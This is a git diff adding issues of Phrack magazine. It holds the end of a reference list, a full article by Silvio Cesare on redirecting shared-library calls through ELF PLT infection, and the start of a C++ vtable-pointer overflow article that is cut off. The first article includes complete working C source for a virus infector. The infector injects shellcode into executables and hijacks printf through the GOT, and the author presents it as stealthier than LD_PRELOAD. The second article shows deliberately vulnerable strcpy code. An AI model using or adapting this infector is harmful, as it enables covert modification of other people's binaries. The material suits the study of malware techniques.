+[16] The Nessus Project
+     http://www.nessus.org
+
+[17] "Attack Trees: Modeling Security Threats" by Bruce Schneier
+     http://www.ddj.com/articles/1999/9912/9912a/9912a.htm, DDJ article on Attack Trees
+
+[18] Analysis of distributed denial of service tools by David Dittrich
+     http://staff.washington.edu/dittrich/
+     Also, the source code for these DoS tools can be found at [3].
+
+|EOF|-------------------------------------------------------------------------|
diff --git a/phrack56/7.txt b/phrack56/7.txt
new file mode 100644
index 0000000..a6c1189
--- /dev/null
+++ b/phrack56/7.txt
@@ -0,0 +1,935 @@
+                      - P H R A C K   M A G A Z I N E -
+
+                            Volume 0xa Issue 0x38
+                                  05.01.2000
+                                  0x07[0x10]
+
+|----------- SHARED LIBRARY CALL REDIRECTION VIA ELF PLT INFECTION -----------|
+|-----------------------------------------------------------------------------|
+|--------------------- Silvio Cesare <silvio@big.net.au> ---------------------|
+
+
+
+----|  INTRODUCTION
+
+This article describes a method of shared library call redirection using ELF
+infection that redirects the Procedure Linkage Table (PLT) of an executable
+allowing redirection to be resident outside of the infected executable. This
+has the advantage over the LD_PRELOAD redirection technique in that no
+environment variables are modified, thus remaining more hidden than previous
+techniques.  An implementation is provided for x86/Linux.  For those interested
+please visit the following URLs:
+
+    http://virus.beergrave.net      (The Unix Virus Mailing List)
+    http://www.big.net.au/~silvio   (My page)
+
+
+----|  THE PROCEDURE LINKAGE TABLE (PLT)
+
+From the ELF specifications... (not necessary to read but gives more detail
+than the follow-up text)
+
+"                       Procedure Linkage Table
+
+Much as the global offset table redirects position-independent address
+calculations to absolute locations, the procedure linkage table
+redirects position-independent function calls to absolute locations.
+The link editor cannot resolve execution transfers (such as function
+calls) from one executable or shared object to another. Consequently,
+the link editor arranges to have the program transfer control to
+entries in the procedure linkage table. On the SYSTEM V architecture,
+procedure linkage tables reside in shared text, but they use addresses
+in the private global offset table. The dynamic linker determines the
+destinations' absolute addresses and modifies the global offset
+table's memory image accordingly. The dynamic linker thus can redirect
+the entries without compromising the position-independence and
+sharability of the program's text. Executable files and shared object
+files have separate procedure linkage tables.
+
++ Figure 2-12: Absolute Procedure Linkage Table {*}
+
+  .PLT0:pushl   got_plus_4
+        jmp     *got_plus_8
+        nop; nop
+        nop; nop
+  .PLT1:jmp     *name1_in_GOT
+        pushl   $offset
+        jmp     .PLT0@PC
+  .PLT2:jmp     *name2_in_GOT
+        pushl   $offset
+        jmp     .PLT0@PC
+        ...
+
++ Figure 2-13: Position-Independent Procedure Linkage Table
+
+  .PLT0:pushl   4(%ebx)
+        jmp     *8(%ebx)
+        nop; nop
+        nop; nop
+  .PLT1:jmp     *name1@GOT(%ebx)
+        pushl   $offset
+        jmp     .PLT0@PC
+  .PLT2:jmp     *name2@GOT(%ebx)
+        pushl   $offset
+        jmp     .PLT0@PC
+        ...
+
+NOTE: As the figures show, the procedure linkage table instructions use
+different operand addressing modes for absolute code and for position-
+independent code. Nonetheless, their interfaces to the dynamic linker are
+the same.
+
+Following the steps below, the dynamic linker and the program ``cooperate''
+to resolve symbolic references through the procedure linkage table and the
+global offset table.
+
+1. When first creating the memory image of the program, the dynamic
+   linker sets the second and the third entries in the global offset
+   table to special values.  Steps below explain more about these
+   values.
+2. If the procedure linkage table is position-independent, the address
+   of the global offset table must reside in %ebx.  Each shared object
+   file in the process image has its own procedure linkage table, and
+   control transfers to a procedure linkage table entry only from
+   within the same object file.  Consequently, the calling function is
+   responsible for setting the global offset table base register before
+   calling the procedure linkage table entry.
+3. For illustration, assume the program calls name1, which transfers
+   control to the label .PLT1.
+4. The first instruction jumps to the address in the global offset
+   table entry for name1.  Initially, the global offset table holds the
+   address of the following pushl instruction, not the real address of
+   name1.
+5. Consequently, the program pushes a relocation offset (offset) on
+   the stack. The relocation offset is a 32-bit, non-negative byte
+   offset into the relocation table.  The designated relocation entry
+   will have type R_386_JMP_SLOT, and its offset will specify the
+   global offset table entry used in the previous jmp instruction. The
+   relocation entry also contains a symbol table index, thus telling
+   the dynamic linker what symbol is being referenced, name1 in this
+   case.
+6. After pushing the relocation offset, the program then jumps to
+   .PLT0, the first entry in the procedure linkage table.  The pushl
+   instruction places the value of the second global offset table
+   entry (got_plus_4 or 4(%ebx)) on the stack, thus giving the dynamic
+   linker one word of identifying information.  The program then jumps
+   to the address in the third global offset table entry (got_plus_8
+   or 8(%ebx)), which transfers control to the dynamic linker.
+7. When the dynamic linker receives control, it unwinds the stack,
+   looks at the designated relocation entry, finds the symbol's value,
+   stores the ``real'' address for name1 in its global offset table
+   entry, and transfers control to the desired destination.
+8. Subsequent executions of the procedure linkage table entry will
+   transfer directly to name1, without calling the dynamic linker a
+   second time. That is, the jmp instruction at .PLT1 will transfer to
+   name1, instead of ``falling through'' to the pushl instruction.
+
+The LD_BIND_NOW environment variable can change dynamic linking
+behavior.  If its value is non-null, the dynamic linker evaluates
+procedure linkage table entries before transferring control to the
+program.  That is, the dynamic linker processes relocation entries of
+type R_386_JMP_SLOT during process initialization.  Otherwise, the
+dynamic linker evaluates procedure linkage table entries lazily,
+delaying symbol resolution and relocation until the first execution of
+a table entry.
+
+NOTE: Lazy binding generally improves overall application performance,
+because unused symbols do not incur the dynamic linking overhead.
+Nevertheless, two situations make lazy binding undesirable for some
+applications.  First, the initial reference to a shared object function
+takes longer than subsequent calls, because the dynamic linker
+intercepts the call to resolve the symbol.  Some applications cannot
+tolerate this unpredictability.  Second, if an error occurs and the
+dynamic linker cannot resolve the symbol, the dynamic linker will
+terminate the program. Under lazy binding, this might occur at
+arbitrary times.  Once again, some applications cannot tolerate this
+unpredictability.  By turning off lazy binding, the dynamic linker
+forces the failure to occur during process initialization, before the
+application receives control.
+"
+
+To explain in more detail...
+
+Shared library calls are treated special in executable objects because they
+cannot be linked to the executable at compile time.  This is due to the fact
+that shared libraries are not available to the executable until runtime.
+The PLT was designed to handle such cases like these.  The PLT holds the code
+responsible for calling the dynamic linker to locate these desired routines.
+
+Instead of calling the real shared library routine in the executable, the
+executable calls an entry in the PLT.  It is then up to the PLT to resolve the
+symbol it represents and do the right thing.
+
+From the ELF specifications...
+
+" .PLT1:jmp     *name1_in_GOT
+        pushl   $offset
+        jmp     .PLT0@PC
+"
+
+This is the important info.   This is the routine called instead of the library
+call.  name1_in_GOT originally starts off pointing to the following pushl
+instruction.  The offset represents a relocation (see the ELF specifications)
+offset which has a reference to the symbol the library call represents.  This
+is used for the final jmp which jumps to the dynamic linker.  The dynamic
+linker then changes name1_in_GOT to point directly to the routine thus avoiding
+dynamic linking a second time.
+
+This summarizes the importance of the PLT in library lookups.  It can be noted
+that we can change name_in_GOT to point to our own code, thus replacing
+library calls.  If we save the state of the GOT before replacing, we can call
+the old library routine and thus redirect any library call.
+
+
+----|  ELF INFECTION
+
+To inject a redirected library call into an executable requires new code to
+be added to an executable.  The actual procedure for ELF infection will not
+be described here as it has been covered very well in previous articles
+(http://www.big.net.au/~silvio - Unix Viruses/Unix ELF Parasites and Virus).
+For completeness Data Infection is used for injection, and it is slightly
+buggy not being strip safe.
+
+
+----|  PLT REDIRECTION
+
+The algorithm at the entry point code is as follows...
+
+	* mark the text segment writeable
+	* save the PLT(GOT) entry
+	* replace the PLT(GOT) entry with the address of the new lib call
+
+The algorithm in the new library call is as follows...
+
+	* do the payload of the new lib call
+	* restore the original PLT(GOT) entry
+	* call the lib call
+	* save the PLT(GOT) entry again (if its changed)
+	* replace the PLT(GOT) entry with the address of the new lib call
+
+To explain more how PLT redirection is done, the simplest method is to describe
+the sample code supplied.  This code is injected into an executable and
+becomes the new entry point of the program.  The library call that is
+redirected is printf, the new code prints a message before the printf
+supplied string.
+
+--
+ok, save the registers and so forth...
+
+        "\x60"                  /*      pusha                   */
+
+mark the text segment as rwx.  We do this so we can modify the PLT which is in
+the text segment and is normally not writeable.
+
+        "\xb8\x7d\x00\x00\x00"  /*      movl   $125,%eax        */
+        "\xbb\x00\x80\x04\x08"  /*      movl   $text_start,%ebx  */
+        "\xb9\x00\x40\x00\x00"  /*      movl   $0x4000,%ecx     */
+        "\xba\x07\x00\x00\x00"  /*      movl   $7,%edx          */
+        "\xcd\x80"              /*      int    $0x80            */
+
+we save the old library call's PLT(GOT) reference and replace it with the
+address of the new library call which immediately follows the entry point code.
+
+        "\xa1\x00\x00\x00\x00"  /*      movl    plt,%eax        */
+        "\xa3\x00\x00\x00\x00"  /*      movl    %eax,oldcall    */
+        "\xc7\x05\x00\x90\x04"  /*      movl    $newcall,plt    */
+        "\x08\x00\x00\x00\x00"
+
+restore the registers and so forth...
+
+        "\x61"                  /*      popa                    */
+
+jump back to the executables original entry point.
+
+        "\xbd\x00\x80\x04\x08"  /*      movl   $entry,%ebp  */
+        "\xff\xe5"              /*      jmp    *%ebp            */
+
+the new library call (printf).
+
+/* newcall:     */
+
+get the address of the string to write .
+
+        "\xeb\x38"              /*      jmp     msg_jmp         */
+/* msg_call */
+        "\x59"                  /*      popl    %ecx            */
+
+and write that string using the Linux system call
+
+        "\xb8\x04\x00\x00\x00"  /*      movl    $4,%eax         */
+        "\xbb\x01\x00\x00\x00"  /*      movl    $1,%ebx         */
+        "\xba\x0e\x00\x00\x00"  /*      movl    $14,%edx        */
+        "\xcd\x80"              /*      int     $0x80           */
+
+restore the old library call into the PLT(GOT) so we can call it
+
+        "\xb8\x00\x00\x00\x00"  /*      movl    $oldcall,%eax   */
+        "\xa3\x00\x00\x00\x00"  /*      movl    %eax,plt        */
+
+get the original printf argument
+
+        "\xff\x75\xfc"          /*      pushl   -4(%ebp)        */
+
+call the original library call
+
+        "\xff\xd0"              /*      call    *%eax           */
+
+save the original library call from the PLT(GOT).  Remember this might change
+after a call to the library, so we save each time.  This actually only changes
+after the first call, but we don't bother too much.
+
+        "\xa1\x00\x00\x00\x00"  /*      movl    plt,%eax        */
+        "\xa3\x00\x00\x00\x00"  /*      movl    %eax,oldcall    */
+
+make the PLT(GOT) point back to the new library call
+
+        "\xc7\x05\x00\x00\x00"  /*      movl    $newcall,plt    */
+        "\x08\x00\x00\x00\x00"
+
+clean up the arguments
+
+        "\x58"                  /*      popl    %eax            */
+
+restore the registers and so forth...
+
+        "\x61"                  /*      popa                    */
+
+and return from the function
+
+        "\xc3"                  /*      ret                     */
+
+get the address of the string to write .
+
+/* msg_jmp */
+        "\xe8\xc4\xff\xff\xff"  /*      call    msg_call        */
+
+the string
+
+        "INFECTED Host "
+
+
+----|  FUTURE DIRECTIONS
+
+It is possible to infect a shared library directly, and this is sometimes more
+desirable because the redirection stays resident for all executables.  Also
+possible, is an even more stealth version of the PLT redirection described
+by modifying the process image directly thus the host executable stays
+unmodified.  This however has the disadvantage that the redirection stays
+active only for the life of a single process.
+
+
+----|  CONCLUSION
+
+This article has described a method of redirecting shared library calls in
+an executable by directly modifying the PLT of the executable in question
+using ELF infection techniques.  It is more stealthy than previous techniques
+using LD_PRELOAD and has large possibilities.
+
+
+----|  CODE
+
+<++> p56/PLT-INFECTION/PLT-infector.c !fda3c047
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/stat.h>
+#include <sys/types.h>
+#include <string.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <elf.h>
+
+#define PAGE_SIZE	4096
+
+static char v[] =
+	"\x60"                  /*      pusha	                */
+	
+	"\xb8\x7d\x00\x00\x00"  /*      movl   $125,%eax        */
+	"\xbb\x00\x80\x04\x08"  /*      movl   $text_start,%ebx	*/
+	"\xb9\x00\x40\x00\x00"  /*      movl   $0x4000,%ecx	*/
+	"\xba\x07\x00\x00\x00"  /*      movl   $7,%edx          */
+	"\xcd\x80"              /*      int    $0x80            */
+
+	"\xa1\x00\x00\x00\x00"	/*	movl	plt,%eax	*/
+	"\xa3\x00\x00\x00\x00"	/*	movl	%eax,oldcall	*/
+	"\xc7\x05\x00\x90\x04"	/*	movl	$newcall,plt	*/
+	"\x08\x00\x00\x00\x00"
+
+	"\x61"                  /*      popa			*/
+
+        "\xbd\x00\x80\x04\x08"  /*      movl   $entry,%ebp	*/
+        "\xff\xe5"              /*      jmp    *%ebp            */
+
+/* newcall:	*/
+
+	"\xeb\x37"		/*	jmp	msg_jmp		*/
+/* msg_call */
+	"\x59"			/*	popl	%ecx		*/
+	"\xb8\x04\x00\x00\x00"	/*	movl	$4,%eax		*/
+	"\xbb\x01\x00\x00\x00"	/*	movl	$1,%ebx		*/
+	"\xba\x0e\x00\x00\x00"	/*	movl	$14,%edx	*/	
+	"\xcd\x80"		/*	int	$0x80		*/
+
+	"\xb8\x00\x00\x00\x00"	/*	movl	$oldcall,%eax	*/
+	"\xa3\x00\x00\x00\x00"	/*	movl	%eax,plt	*/
+	"\xff\x75\xfc"		/*	pushl	-4(%ebp)	*/
+	"\xff\xd0"		/*	call	*%eax		*/
+	"\xa1\x00\x00\x00\x00"	/*	movl	plt,%eax	*/
+	"\xa3\x00\x00\x00\x00"	/*	movl	%eax,oldcall	*/
+	"\xc7\x05\x00\x00\x00"	/*	movl	$newcall,plt	*/
+	"\x08\x00\x00\x00\x00"
+
+	"\x58"			/*	popl	%eax		*/
+
+	"\xc3"			/*	ret			*/
+
+/* msg_jmp */
+	"\xe8\xc4\xff\xff\xff"	/*	call	msg_call	*/
+
+	"INFECTED Host "
+;
+
+char *get_virus(void)
+{
+	return v;
+}
+
+int init_virus(
+	int plt,
+	int offset,
+	int text_start, int data_start,
+	int data_memsz,
+	int entry
+)
+{
+	int code_start = data_start + data_memsz;
+	int oldcall = code_start + 72;
+	int newcall = code_start + 51;
+
+	*(int *)&v[7] = text_start;
+	*(int *)&v[24] = plt;
+	*(int *)&v[29] = oldcall;
+	*(int *)&v[35] = plt;
+	*(int *)&v[39] = newcall;
+	*(int *)&v[45] = entry;
+	*(int *)&v[77] = plt;
+	*(int *)&v[87] = plt;
+	*(int *)&v[92] = oldcall;
+	*(int *)&v[98] = plt;
+	*(int *)&v[102] = newcall;
+	return 0;
+}
+
+int copy_partial(int fd, int od, unsigned int len)
+{
+	char idata[PAGE_SIZE];
+	unsigned int n = 0;
+	int r;
+
+	while (n + PAGE_SIZE < len) {
+		if (read(fd, idata, PAGE_SIZE) != PAGE_SIZE) {;
+			perror("read");
+			return -1;
+		}
+
+		if (write(od, idata, PAGE_SIZE) < 0) {
+			perror("write");
+			return -1;
+		}
+
+		n += PAGE_SIZE;
+	}
+
+	r = read(fd, idata, len - n);
+	if (r < 0) {
+		perror("read");
+		return -1;
+	}
+
+	if (write(od, idata, r) < 0) {
+		perror("write");
+		return -1;
+	}
+
+	return 0;
+}
+
+void do_elf_checks(Elf32_Ehdr *ehdr)
+{
+        if (strncmp(ehdr->e_ident, ELFMAG, SELFMAG)) {
+                fprintf(stderr, "File not ELF\n");
+                exit(1);
+        }
+
+        if (ehdr->e_type != ET_EXEC) {
+                fprintf(stderr, "ELF type not ET_EXEC or ET_DYN\n");
+                exit(1);
+        }
+
+        if (ehdr->e_machine != EM_386 && ehdr->e_machine != EM_486) {
+                fprintf(stderr, "ELF machine type not EM_386 or EM_486\n");
+                exit(1);
+        }
+
+        if (ehdr->e_version != EV_CURRENT) {
+                fprintf(stderr, "ELF version not current\n");
+                exit(1);
+        }
+}
+
+int do_dyn_symtab(
+	int fd,
+	Elf32_Shdr *shdr, Elf32_Shdr *shdrp,
+	const char *sh_function
+)
+{
+	Elf32_Shdr *strtabhdr = &shdr[shdrp->sh_link];
+	char *string;
+	Elf32_Sym *sym, *symp;
+	int i;
+
+	string = (char *)malloc(strtabhdr->sh_size);
+	if (string == NULL) {
+		perror("malloc");
+		exit(1);
+	}
+
+	if (lseek(
+		fd, strtabhdr->sh_offset, SEEK_SET) != strtabhdr->sh_offset
+	) {
+		perror("lseek");
+		exit(1);
+	}
+
+	if (read(fd, string, strtabhdr->sh_size) != strtabhdr->sh_size) {
+		perror("read");
+		exit(1);
+	}
+
+	sym = (Elf32_Sym *)malloc(shdrp->sh_size);
+	if (sym == NULL) {
+		perror("malloc");
+		exit(1);
+	}
+
+	if (lseek(fd, shdrp->sh_offset, SEEK_SET) != shdrp->sh_offset) {
+		perror("lseek");
+		exit(1);
+	}
+
+	if (read(fd, sym, shdrp->sh_size) != shdrp->sh_size) {
+		perror("read");
+		exit(1);
+	}
+
+	symp = sym;
+
+	for (i = 0; i < shdrp->sh_size; i += sizeof(Elf32_Sym)) {
+		if (!strcmp(&string[symp->st_name], sh_function)) {
+			free(string);
+			return symp - sym;
+		}
+
+		++symp;
+	}
+
+	free(string);
+	return -1;
+}
+
+int get_sym_number(
+	int fd, Elf32_Ehdr *ehdr, Elf32_Shdr *shdr, const char *sh_function
+)
+{
+	Elf32_Shdr *shdrp = shdr;
+	int i;
+
+	for (i = 0; i < ehdr->e_shnum; i++) {
+		if (shdrp->sh_type == SHT_DYNSYM) {
+			return do_dyn_symtab(fd, shdr, shdrp, sh_function);
+		}
+
+		++shdrp;
+	}
+}
+
+void do_rel(int *plt, int *offset, int fd, Elf32_Shdr *shdr, int sym)
+{
+	Elf32_Rel *rel, *relp;
+	int i;
+
+	rel = (Elf32_Rel *)malloc(shdr->sh_size);
+	if (rel == NULL) {
+		perror("malloc");
+		exit(1);
+	}
+
+	if (lseek(fd, shdr->sh_offset, SEEK_SET) != shdr->sh_offset) {
+		perror("lseek");
+		exit(1);
+	}
+
+	if (read(fd, rel, shdr->sh_size) != shdr->sh_size) {
+		perror("read");
+		exit(1);
+	}
+
+	relp = rel;
+
+	for (i = 0; i < shdr->sh_size; i += sizeof(Elf32_Rel)) {
+		if (ELF32_R_SYM(relp->r_info) == sym) {
+			*plt = relp->r_offset;
+			*offset = relp - rel;
+			printf("offset %i\n", *offset);
+			return;
+		}
+		++relp;
+	}
+
+	*plt = -1;
+	*offset = -1;
+}
+
+void find_rel(
+	int *plt,
+	int *offset,
+	int fd,
+	const char *string,
+	Elf32_Ehdr *ehdr, Elf32_Shdr *shdr,
+	const char *sh_function
+)
+{
+	Elf32_Shdr *shdrp = shdr;
+	int sym;
+	int i;
+
+	sym = get_sym_number(fd, ehdr, shdr, sh_function);
+	if (sym < 0) {
+		*plt = -1;
+		*offset = -1;
+		return;
+	}
+
+	for (i = 0; i < ehdr->e_shnum; i++) {
+		if (!strcmp(&string[shdrp->sh_name], ".rel.plt")) {
+			do_rel(plt, offset, fd, shdrp, sym);
+			return;
+		}
+
+		++shdrp;
+	}
+}
+
+void infect_elf(
+        char *host,
+        char *(*get_virus)(void),
+        int (*init_virus)(int, int, int, int, int, int),
+        int len,
+	const char *sh_function
+)
+
+{
+	Elf32_Ehdr ehdr;
+	Elf32_Shdr *shdr, *strtabhdr;
+	Elf32_Phdr *phdr;
+	char *pdata, *sdata;
+	int move = 0;
+	int od, fd;
+	int evaddr, text_start = -1, plt;
+	int sym_offset;
+	int bss_len, addlen;
+	int offset, pos, oshoff;
+	int plen, slen;
+	int i;
+	char null = 0;
+	struct stat stat;
+	char *string;
+        char tempname[8] = "vXXXXXX";
+
+	fd = open(host, O_RDONLY);
+	if (fd < 0) {
+		perror("open");
+		exit(1);
+	}
+
+/* read the ehdr */
+
+	if (read(fd, &ehdr, sizeof(ehdr)) < 0) {
+		perror("read");
+		exit(1);
+	}
+
+	do_elf_checks(&ehdr);
+
+/* modify the virus so that it knows the correct reentry point */
+
+	printf("host entry point: %x\n", ehdr.e_entry);
+
+/* allocate memory for phdr tables */
+
+	pdata = (char *)malloc(plen = sizeof(*phdr)*ehdr.e_phnum);
+	if (pdata == NULL) {
+		perror("malloc");
+		exit(1);
+	}
+
+/* read the phdr's */
+
+	if (lseek(fd, ehdr.e_phoff, SEEK_SET) < 0) {
+		perror("lseek");
+		exit(1);
+	}
+
+	if (read(fd, pdata, plen) != plen) {
+		perror("read");
+		exit(1);
+	}
+	phdr = (Elf32_Phdr *)pdata;
+
+/* allocated memory if required to accomodate the shdr tables */
+
+	sdata = (char *)malloc(slen = sizeof(*shdr)*ehdr.e_shnum);
+	if (sdata == NULL) {
+		perror("malloc");
+		exit(1);
+	}
+
+/* read the shdr's */
+
+	if (lseek(fd, oshoff = ehdr.e_shoff, SEEK_SET) < 0) {
+		perror("lseek");
+		exit(1);
+	}
+
+	if (read(fd, sdata, slen) != slen) {
+		perror("read");
+		exit(1);
+	}
+
+	strtabhdr = &((Elf32_Shdr *)sdata)[ehdr.e_shstrndx];
+
+	string = (char *)malloc(strtabhdr->sh_size);
+	if (string == NULL) {
+		perror("malloc");
+		exit(1);
+	}
+
+	if (lseek(
+		fd, strtabhdr->sh_offset, SEEK_SET
+	) != strtabhdr->sh_offset) {
+		perror("lseek");
+		exit(1);
+	}
+
+	if (read(fd, string, strtabhdr->sh_size) != strtabhdr->sh_size) {
+		perror("read");
+		exit(1);
+	}
+
+	find_rel(
+		&plt, &sym_offset,
+		fd,
+		string,
+		&ehdr,
+		(Elf32_Shdr *)sdata,
+		sh_function
+	);
+	if (plt < 0) {
+		printf("No dynamic function: %s\n", sh_function);
+		exit(1);
+	}
+
+	for (i = 0; i < ehdr.e_phnum; i++) {
+		if (phdr->p_type == PT_LOAD) {
+			if (phdr->p_offset == 0) {
+				text_start = phdr->p_vaddr;
+			} else {
+				if (text_start < 0) {
+					fprintf(stderr, "No text segment??\n");
+					exit(1);
+				}
+
+/* is this the data segment ? */
+#ifdef DEBUG
+				printf("Found PT_LOAD segment...\n");
+				printf(
+					"p_vaddr:	0x%x\n"
+					"p_offset:	%i\n"
+					"p_filesz:	%i\n"
+					"p_memsz:	%i\n"
+					"\n",
+					phdr->p_vaddr,
+					phdr->p_offset,
+					phdr->p_filesz,
+					phdr->p_memsz
+				);
+#endif
+				offset = phdr->p_offset + phdr->p_filesz;
+				bss_len = phdr->p_memsz - phdr->p_filesz;
+
+				if (init_virus != NULL)
+					init_virus(
+						plt, sym_offset,
+						text_start, phdr->p_vaddr,
+						phdr->p_memsz,
+						ehdr.e_entry
+					);
+
+				ehdr.e_entry = phdr->p_vaddr + phdr->p_memsz; 
+
+				break;
+			}
+		}
+
+		++phdr;
+	}
+
+/* update the shdr's to reflect the insertion of the virus */
+
+	addlen = len + bss_len;
+
+	shdr = (Elf32_Shdr *)sdata;
+
+	for (i = 0; i < ehdr.e_shnum; i++) {
+		if (shdr->sh_offset >= offset) {
+			shdr->sh_offset += addlen;
+		}
+
+		++shdr;
+	}
+
+/*
+	update the phdr's to reflect the extention of the data segment (to
+	allow virus insertion)
+*/
+
+	phdr = (Elf32_Phdr *)pdata;
+
+	for (i = 0; i < ehdr.e_phnum; i++) {
+		if (phdr->p_type != PT_DYNAMIC) {
+			if (move) {
+				phdr->p_offset += addlen;
+			} else if (phdr->p_type == PT_LOAD && phdr->p_offset) {
+/* is this the data segment ? */
+
+				phdr->p_filesz += addlen;
+				phdr->p_memsz += addlen;
+
+#ifdef DEBUG
+				printf("phdr->filesz: %i\n", phdr->p_filesz);
+				printf("phdr->memsz: %i\n", phdr->p_memsz);
+#endif
+ 				move = 1;
+			}
+		}
+
+		++phdr;
+	}
+
+/* update ehdr to reflect new offsets */
+
+	if (ehdr.e_shoff >= offset) ehdr.e_shoff += addlen;
+	if (ehdr.e_phoff >= offset) ehdr.e_phoff += addlen;
+
+        if (fstat(fd, &stat) < 0) {
+                perror("fstat");
+                exit(1);
+        }
+
+/* write the new virus */
+
+        if (mktemp(tempname) == NULL) {
+                perror("mktemp");
+                exit(1);
+        }
+
+	od = open(tempname, O_WRONLY | O_CREAT | O_EXCL, stat.st_mode);
+	if (od < 0) {
+		perror("open");
+		exit(1);
+	}
+
+	if (lseek(fd, 0, SEEK_SET) < 0) {
+		perror("lseek");
+		goto cleanup;
+	}
+
+	if (write(od, &ehdr, sizeof(ehdr)) < 0) {
+		perror("write");
+		goto cleanup;
+	}
+
+        if (write(od, pdata, plen) < 0) {
+                perror("write");
+                goto cleanup;
+        }
+        free(pdata);
+
+        if (lseek(fd, pos = sizeof(ehdr) + plen, SEEK_SET) < 0) {
+                perror("lseek");
+                goto cleanup;
+        }
+
+	if (copy_partial(fd, od, offset - pos) < 0) goto cleanup;
+
+	for (i = 0; i < bss_len; i++) write(od, &null, 1);
+
+	if (write(od, get_virus(), len) != len) {
+		perror("write");
+		goto cleanup;
+	}
+
+	if (copy_partial(fd, od, oshoff - offset) < 0) goto cleanup;
+
+        if (write(od, sdata, slen) < 0) {
+                perror("write");
+                goto cleanup;
+        }
+        free(sdata);
+
+        if (lseek(fd, pos = oshoff + slen, SEEK_SET) < 0) {
+                perror("lseek");
+                goto cleanup;
+        }
+
+        if (copy_partial(fd, od, stat.st_size - pos) < 0) goto cleanup;
+
+        if (rename(tempname, host) < 0) {
+                perror("rename");
+                exit(1);
+        }
+
+        if (fchown(od, stat.st_uid, stat.st_gid) < 0) {
+                perror("chown");
+                exit(1);
+        }
+
+
+	free(string);
+
+	return;
+
+cleanup:
+	unlink(tempname);
+	exit(1);
+}
+
+int main(int argc, char *argv[])
+{
+	if (argc != 2) {
+		fprintf(stderr, "usage: infect-data-segment filename\n");
+		exit(1);
+	}
+
+        infect_elf(
+                argv[1],
+                get_virus, init_virus,
+                sizeof(v),
+		"printf"
+        );
+
+	exit(0);
+}
+<-->
+
+
+|EOF|-------------------------------------------------------------------------|
diff --git a/phrack56/8.txt b/phrack56/8.txt
new file mode 100644
index 0000000..dbba276
--- /dev/null
+++ b/phrack56/8.txt
@@ -0,0 +1,1388 @@
+                      - P H R A C K   M A G A Z I N E -
+
+                            Volume 0xa Issue 0x38
+                                  05.01.2000
+                                  0x08[0x10]
+
+|----------------------------- SMASHING C++ VPTRS ----------------------------|
+|-----------------------------------------------------------------------------|
+|-------------------------- rix <rix@securiweb.net> --------------------------|
+
+
+----|  Introduction
+
+At the present time, a widely known set of techniques instructs us how to
+exploit buffer overflows in programs usually written in C.  Although C is
+almost ubiquitously used, we are seeing many programs also be written in C++.
+For the most part, the techniques that are applicable in C are available in
+C++ also, however, C++ can offer us new possibilities in regards to buffer
+overflows, mostly due to the use of object oriented technologies.  We are
+going to analyze one of these possibilities, using the C++ GNU compiler,
+on an x86 Linux system.
+
+
+----|  C++ Backgrounder
+
+We can define a "class" as being a structure that contains data and a set of 
+functions (called "methods").  Then, we can create variables based on this
+class definition.  Those variables are called "objects".  For example, we
+can have the following program (bo1.cpp):
+
+
+#include <stdio.h>
+#include <string.h>
+
+class MyClass
+{ 
+    private:
+        char Buffer[32];
+    public:
+        void SetBuffer(char *String)
+        {
+            strcpy(Buffer, String);
+        }
+        void PrintBuffer()
+        {
+            printf("%s\n", Buffer);
+        }
+};
+
+void main()
+{
+     MyClass Object;
+
+     Object.SetBuffer("string");
+     Object.PrintBuffer();
+}
+
+
+This small program defines a MyClass class that possesses 2 methods:
+
+1) A SetBuffer() method, that fills an internal buffer to the class (Buffer).
+2) A PrintBuffer() method, that displays the content of this buffer.
+
+Then, we define an Object object based on the MyClass class.  Initially, we'll
+notice that the SetBuffer() method uses a *very dangerous* function to fill
+Buffer, strcpy()...
+
+As it happens, using object oriented programming in this simplistic example
+doesn't bring too many advantages.  On the other hand, a mechanism very often
+used in object oriented programming is the inheritance mechanism.  Let's
+consider the following program (bo2.cpp), using the inheritance mechanism
+to create 2 classes with distinct PrintBuffer() methods:
+
+
+#include <stdio.h>
+#include <string.h>
+
+class BaseClass
+{
+    private:
+        char Buffer[32];
+    public:
+        void SetBuffer(char *String)
+        {
+            strcpy(Buffer,String);
+        }
+        virtual void PrintBuffer()
+        {
+            printf("%s\n",Buffer);
+        }
+};
+
+class MyClass1:public BaseClass
+{
+    public:
+        void PrintBuffer()
+        {
+            printf("MyClass1: ");
+            BaseClass::PrintBuffer();
+        }
+};
+
+class MyClass2:public BaseClass
+{
+    public:
+        void PrintBuffer()
+        {
+            printf("MyClass2: ");
+            BaseClass::PrintBuffer();
+        }
+};
+
+void main()
+{
+    BaseClass *Object[2];
+
+    Object[0] = new MyClass1;
+    Object[1] = new MyClass2; 
+
+    Object[0]->SetBuffer("string1");
+    Object[1]->SetBuffer("string2");
+    Object[0]->PrintBuffer();
+    Object[1]->PrintBuffer();
+}
+
+This program creates 2 distinct classes (MyClass1, MyClass2) which are
+derivatives of a BaseClass class.  These 2 classes differ at the display level
+(PrintBuffer() method).  Each has its own PrintBuffer() method, but they both
+call the original PrintBuffer() method (from BaseClass).  Next, we have the
+main() function define an array of pointers to two objects of class BaseClass.
+Each of these objects is created, as derived from MyClass1 or MyClass2.
+Then we call the SetBuffer() and PrintBuffer() methods of these two objects.
+Executing the program produces this output:
+
+rix@pentium:~/BO> bo2
+MyClass1: string1
+MyClass2: string2
+rix@pentium:~/BO>
+
+We now notice the advantage of object oriented programming.  We have the
+same calling primitives to PrintBuffer() for two different classes!  This is
+the end result from virtual methods.  Virtual methods permit us to redefine
+newer versions of methods of our base classes, or to define a method of the
+base classes (if the base class is purely abstracted) in a derivative class.
+If we don't declare the method as virtual, the compiler would do the call
+resolution at compile time ("static binding").  To resolve the call at run
+time (because this call depends on the class of objects that we have in our
+Object[] array), we must declare our PrintBuffer() method as "virtual".  The
+compiler will then use a dynamic binding, and will calculate the address for
+the call at run time.
+
+
+----|  C++ VPTR
+
+We are now going to analyze in a more detailed manner this dynamic binding 
+mechanism.  Let's take the case of our BaseClass class and its derivative
+classes.
+
+The compiler first browses the declaration of BaseClass.  Initially, it
+reserves 32 bytes for the definition of Buffer.  Then, it reads the
+declaration of the SetBuffer() method (not virtual) and it directly assigns
+the corresponding address in the code.  Finally, it reads the declaration of
+the PrintBuffer() method (virtual).  In this case, instead of doing a static
+binding, it does a dynamic binding, and reserves 4 bytes in the class (those
+bytes will contain a pointer).  We have now the following structure:
+
+        BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBVVVV
+
+Where: B represents a byte of Buffer.
+       V represents a byte of our pointer.
+
